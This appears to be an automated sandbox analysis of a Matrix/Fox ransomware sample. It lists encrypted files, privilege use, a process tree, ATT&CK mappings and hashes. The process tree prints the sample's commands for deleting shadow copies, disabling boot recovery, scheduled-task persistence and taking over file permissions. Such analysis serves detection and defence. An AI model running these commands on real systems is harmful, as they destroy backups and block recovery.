9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21534_.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CHECKER.POC 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746G.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\Xlate_Init.xsn 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSACC.OLB 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2892 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2304 vssadmin.exe 2960 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2712 powershell.exe 4796 nt7HdeS164.exe 4796 nt7HdeS164.exe 4796 nt7HdeS164.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4796 nt7HdeS164.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 4796 nt7HdeS164.exe Token: SeLoadDriverPrivilege 4796 nt7HdeS164.exe Token: SeBackupPrivilege 4848 vssvc.exe Token: SeRestorePrivilege 4848 vssvc.exe Token: SeAuditPrivilege 4848 vssvc.exe Token: SeIncreaseQuotaPrivilege 1712 WMIC.exe Token: SeSecurityPrivilege 1712 WMIC.exe Token: SeTakeOwnershipPrivilege 1712 WMIC.exe Token: SeLoadDriverPrivilege 1712 WMIC.exe Token: SeSystemProfilePrivilege 1712 WMIC.exe Token: SeSystemtimePrivilege 1712 WMIC.exe Token: SeProfSingleProcessPrivilege 1712 WMIC.exe Token: SeIncBasePriorityPrivilege 1712 WMIC.exe Token: SeCreatePagefilePrivilege 1712 WMIC.exe Token: SeBackupPrivilege 1712 WMIC.exe Token: SeRestorePrivilege 1712 WMIC.exe Token: SeShutdownPrivilege 1712 WMIC.exe Token: SeDebugPrivilege 1712 WMIC.exe Token: SeSystemEnvironmentPrivilege 1712 WMIC.exe Token: SeRemoteShutdownPrivilege 1712 WMIC.exe Token: SeUndockPrivilege 1712 WMIC.exe Token: SeManageVolumePrivilege 1712 WMIC.exe Token: 33 1712 WMIC.exe Token: 34 1712 WMIC.exe Token: 35 1712 WMIC.exe Token: SeIncreaseQuotaPrivilege 1712 WMIC.exe Token: SeSecurityPrivilege 1712 WMIC.exe Token: SeTakeOwnershipPrivilege 1712 WMIC.exe Token: SeLoadDriverPrivilege 1712 WMIC.exe Token: SeSystemProfilePrivilege 1712 WMIC.exe Token: SeSystemtimePrivilege 1712 WMIC.exe Token: SeProfSingleProcessPrivilege 1712 WMIC.exe Token: SeIncBasePriorityPrivilege 1712 WMIC.exe Token: SeCreatePagefilePrivilege 1712 WMIC.exe Token: SeBackupPrivilege 1712 WMIC.exe Token: SeRestorePrivilege 1712 WMIC.exe Token: SeShutdownPrivilege 1712 WMIC.exe Token: SeDebugPrivilege 1712 WMIC.exe Token: SeSystemEnvironmentPrivilege 1712 WMIC.exe Token: SeRemoteShutdownPrivilege 1712 WMIC.exe Token: SeUndockPrivilege 1712 WMIC.exe Token: SeManageVolumePrivilege 1712 WMIC.exe Token: 33 1712 WMIC.exe Token: 34 1712 WMIC.exe Token: 35 1712 WMIC.exe Token: SeDebugPrivilege 2020 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2856 wrote to memory of 2284 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2856 wrote to memory of 2284 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2856 wrote to memory of 2284 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2856 wrote to memory of 2284 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 29 PID 2856 wrote to memory of 2464 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2856 wrote to memory of 2464 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2856 wrote to memory of 2464 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2856 wrote to memory of 2464 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 31 PID 2856 wrote to memory of 2268 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2856 wrote to memory of 2268 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2856 wrote to memory of 2268 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2856 wrote to memory of 2268 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 33 PID 2268 wrote to memory of 2712 2268 cmd.exe 35 PID 2268 wrote to memory of 2712 2268 cmd.exe 35 PID 2268 wrote to memory of 2712 2268 cmd.exe 35 PID 2268 wrote to memory of 2712 2268 cmd.exe 35 PID 2856 wrote to memory of 1920 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 36 PID 2856 wrote to memory of 1920 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 36 PID 2856 wrote to memory of 1920 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 36 PID 2856 wrote to memory of 1920 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 36 PID 2856 wrote to memory of 332 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 37 PID 2856 wrote to memory of 332 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 37 PID 2856 wrote to memory of 332 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 37 PID 2856 wrote to memory of 332 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 37 PID 1920 wrote to memory of 668 1920 cmd.exe 40 PID 1920 wrote to memory of 668 1920 cmd.exe 40 PID 1920 wrote to memory of 668 1920 cmd.exe 40 PID 1920 wrote to memory of 668 1920 cmd.exe 40 PID 332 wrote to memory of 592 332 cmd.exe 41 PID 332 wrote to memory of 592 332 cmd.exe 41 PID 332 wrote to memory of 592 332 cmd.exe 41 PID 332 wrote to memory of 592 332 cmd.exe 41 PID 1920 wrote to memory of 984 1920 cmd.exe 42 PID 1920 wrote to memory of 984 1920 cmd.exe 42 PID 1920 wrote to memory of 984 1920 cmd.exe 42 PID 1920 wrote to memory of 984 1920 cmd.exe 42 PID 1920 wrote to memory of 1752 1920 cmd.exe 43 PID 1920 wrote to memory of 1752 1920 cmd.exe 43 PID 1920 wrote to memory of 1752 1920 cmd.exe 43 PID 1920 wrote to memory of 1752 1920 cmd.exe 43 PID 2856 wrote to memory of 1780 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 44 PID 2856 wrote to memory of 1780 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 44 PID 2856 wrote to memory of 1780 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 44 PID 2856 wrote to memory of 1780 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 44 PID 1780 wrote to memory of 1152 1780 cmd.exe 46 PID 1780 wrote to memory of 1152 1780 cmd.exe 46 PID 1780 wrote to memory of 1152 1780 cmd.exe 46 PID 1780 wrote to memory of 1152 1780 cmd.exe 46 PID 592 wrote to memory of 3108 592 wscript.exe 47 PID 592 wrote to memory of 3108 592 wscript.exe 47 PID 592 wrote to memory of 3108 592 wscript.exe 47 PID 592 wrote to memory of 3108 592 wscript.exe 47 PID 3108 wrote to memory of 2892 3108 cmd.exe 49 PID 3108 wrote to memory of 2892 3108 cmd.exe 49 PID 3108 wrote to memory of 2892 3108 cmd.exe 49 PID 3108 wrote to memory of 2892 3108 cmd.exe 49 PID 1780 wrote to memory of 1264 1780 cmd.exe 50 PID 1780 wrote to memory of 1264 1780 cmd.exe 50 PID 1780 wrote to memory of 1264 1780 cmd.exe 50 PID 1780 wrote to memory of 1264 1780 cmd.exe 50 PID 1780 wrote to memory of 3904 1780 cmd.exe 52 PID 1780 wrote to memory of 3904 1780 cmd.exe 52 PID 1780 wrote to memory of 3904 1780 cmd.exe 52 PID 1780 wrote to memory of 3904 1780 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1152 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe"2⤵PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWtN47iM.exe" -n2⤵
- Executes dropped EXE
PID:2464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Kc1sJfyH.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aehUlKm1.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aehUlKm1.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:668
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:984
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\TQjosvO6.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\TQjosvO6.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:2964
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\erg3H7Vx.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Views/modifies file attributes
PID:1152
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nt7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3700 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nt7HdeS1.exent7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\nt7HdeS164.exent7HdeS1.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D122CE25-E8EE-4924-B75E-E5B3667417C0} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵PID:4936
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\1XP4PlhR.bat"2⤵PID:3304
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2304
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:2960
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2192
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:4828
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:2780
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4848
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD57f3866550bab36f4ec092027a89abab2
SHA15332c64e5cef61f2c998c6d9b47de8131d96c130
SHA2566832c5589b9ce335aac7af3d6e917ff580e4b0d038b0936e0d6258c2db9abe86
SHA512a453f7f0f5f28dedd665a1f934a6167be344b886580f00adbac99a7ba502684696f090a502b671ec74cb45ad26d53828e30448b84070411b2ae406ef0c0057ca
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
1.2MB
MD576b640aa00354e46b29ca7ac2adfd732
SHA1afebf9d72ba7186afefebf4deda87675621b0b8b
SHA2560b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
Filesize
20KB
MD50ea1b0923b0e70fe6201f593b4529138
SHA1882cc7f744d1d8de3d4d149e99b1f867c9222e50
SHA256845f768081e7201e3361ca23327cdbfc0ca242f4f77156515bccafe2dfb1f2ab
SHA5125f2fc36e13bfc258b1d32a913ab867c81f41272cf8e1d153e773aca3692597fb21e63b06a9c05fc5fddfe416009d7832dda388f18f1dff12c6d136f1f8699e32
-
Filesize
246B
MD565f53a4f315ba04100247f1a74e83563
SHA13ea9d19bed7f4c19357a005897453af24ffc33b8
SHA256c0b66a9cc3706fcfb2c6652b720e6b2490dcfd7a7940807a185aa11dd887169f
SHA512a303f1e4d6234c6827f69f2c38aee74c663727937a3cb3ba4e5a5c176a002dc8400cd628dce0fe68838f483d9a33a000b1d0a23943da98a42c614b4d1b4f2ddd
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
415B
MD57d55f71b67cf7c7ab6839b0ac5f2509a
SHA15000ca2f9b224f26264334711c25fb14fc6de1b5
SHA256f3276096d90b379ff283449a090195b06df22b5ead38960b2adb50d5fa7c24c4
SHA512f92a9dcf6e6bffac9208e65c4e1551cd825b9fe572efbeb9d1a505f527d2f34de21bcea93c0ce5ca787dab80568c125fc79e6872bd3bb3e6fe299b936c1cee0d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VR2V2MV0Z3RFVGOKJ36U.temp
Filesize7KB
MD5d4436f323fa871e6d65c12cc5245642e
SHA1746ce9e95afb258bf0336833b0008c5045e5a34a
SHA256af5a1e5d8d6d0ba0fdcef5571c139c0042f0f46ddabf09dabeef66426c054e41
SHA51216a4df511bb1dca4e5813e573a57734c53e2898cb43299dfdc4fc307797f0c621c7aecfbcca9518a09f3409c83c630d80c70ef6d43d23afbd33ea7379272a087
-
Filesize
260B
MD5c9fcd262b9ce092c6655a58c0ccbc260
SHA1faedc154ee26e8327cc8298ead452d2858640674
SHA256b1d4f36f8128d47983f34f9b79a6ca0e34efa29c2dc2503f21556f70608bba36
SHA5122e44b5bdf4ad3e29ca5ee7fde92afd4a4584689eb87c55975a7709f0f629ef551c53897a46ea6aeee9acd32fdae77511a583365b472a3545a7adbbf61d85465e